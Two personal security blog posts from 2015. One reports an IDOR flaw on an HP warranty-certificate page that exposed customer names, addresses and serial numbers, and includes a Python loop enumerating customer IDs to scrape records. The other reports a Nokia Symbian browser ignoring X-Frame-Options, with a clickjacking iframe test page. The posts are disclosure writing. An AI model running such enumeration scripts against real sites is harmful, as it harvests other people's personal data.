Wednesday 28 October 2015

Vulnerability in HP which leaked their users data

HI! all I am writing blog post really after a very long time. Sorry!
Well, this is a bug story of HP (Hewlett-Packard). I guess everyone knows about them.

The Hewlett-Packard Company is an American global information technology company headquartered in Palo Alto, California, United States.

A few months back, I purchased a Laptop of HP. After purchasing, I had to register myself for warranty extensions, and stuff and those processes were online. After completing my process, they sent me an email regarding that, my order has been registered and all. So please download a certificate of that.

   (CLICK ON THE IMAGE TO ENLARGE IT :) )

Well ok!

On visiting the link, I was sent to a page which asked me to click and generate my certificate.


Let do that :)

On doing that I was redirected to 

https://h30125.www3.hp.com/HPCSN/ELFOnline/elf_all_certificates.aspx?code=ELEM:34:#USA&languageid=EN&salesordernumber=AP03919763&countrycode=IN&hidDateFormat=&usertypeis=&useridis=&selectedcategory=customer&customerid=30394780&provider=1
Now when I looked at the URL, the parameter customerid looked interesting. Let change that and check what happens. Viola




So HP is exposing their customers
Name
Address
Product Serial No.
Product Number Product Description
HP Care Pack Serial Number

BAD RIGHT?

Since ID what I got was somewhere 30394780 ... So I guess too many data getting exposed.

I wrote a simple python code for it.

import re
import urllib2,sys
from bs4 import BeautifulSoup
id = 30394790
while (id < 30394850):
html = urllib2.urlopen("http://h30125.www3.hp.com/HPCSN/ELFOnline/elf_all_certificates.aspx?code=ELEM:34:%23USA&languageid=EN&salesordernumber=AP03919763&countrycode=IN&hidDateFormat=&usertypeis=&useridis=&selectedcategory=customer&customerid={id}&provider=1".format(id=id)).read()
soup = BeautifulSoup(html)
text = soup.get_text()
text2 = text.replace("\n", "")
text2 = text2.replace("  ", "\n")
text2 = text2.replace("\n", "") #meh was just trying to remove garbage whitespaces
id = id + 1
print "DATA OF  " + str(id) + "\n \n"
print text2
just checking users data from id 30394790 to id while 30394850

OUCH 


Conclusion everything is getting online, and big companies are yet to realize that their customer's data is at risk. Making worldwide reports on cybersecurity and yet themselves failing to protect their customer's data is an irony.

And why leaking out these serial number and product ids are bad? Readout this story how a pro-social engineer ripped many big companies, and one of his methods included cracking the serial number pattern of a product.

http://kernelmag.dailydot.com/issue-sections/features-issue-sections/13930/social-engineering-scripts/

Wednesday 25 March 2015

The Nokia browser Bug

Well here is an old Nokia browser bug (for Symbian) which was declared as won't fix by Nokia.

Test device :- nokia 5233
vulnerable application :- Nokia browser 7.3.1.33


Everyone is quite well aware of clickjacking bugs.

If you don't, then read it out.

https://www.owasp.org/index.php/Clickjacking

Most of the website owners use the x-frame header option to avoid clickjacking over their website. And this feature is supported by almost all browser.



As it can be seen in the above image, Google uses x-frame-options. So if you try to open their website in an iframe...



The website won't load. But...

When the same thing

<html>
<head>
<title>Clickjack test page</title>
</head>
<body>
<p>Website is vulnerable to clickjacking!</p>
<iframe src="http://www.google.com" width="350" height="400"></iframe>
</body>
</html>
Was opened in a Nokia symbian browser


Buuhahahah. Kind of universal clickjacking.

Well, opera browsers were not vulnerable :)




 I reported it on 21st March 2013

But they said they won't fix.


There can be many reasons for not fixing it. The best one I guess is they are busy manufacturing Lumia and Symbian are out of the game :D.
But they should have fixed it because clickjacking is quite harmful in some of the cases and is even used as a catalyst for CSRF attacks. Suppose you are visiting an XYZ website. And the bad website owner has found a CSRF bug. He hides the payload in a frame inside his webpages. Sets the height and width of the frame to zero or changes the opacity to make it invisible, and everything will go un-noticed. Even applicable for an XSS bug. Executing XSS and CSRF inside an invisible frame has the least probability of suspicion rather than crafting the payload URL and send emails or use your ninja S.E tricks to take over the victim.


Cheers :)
Sorry for a very late post :)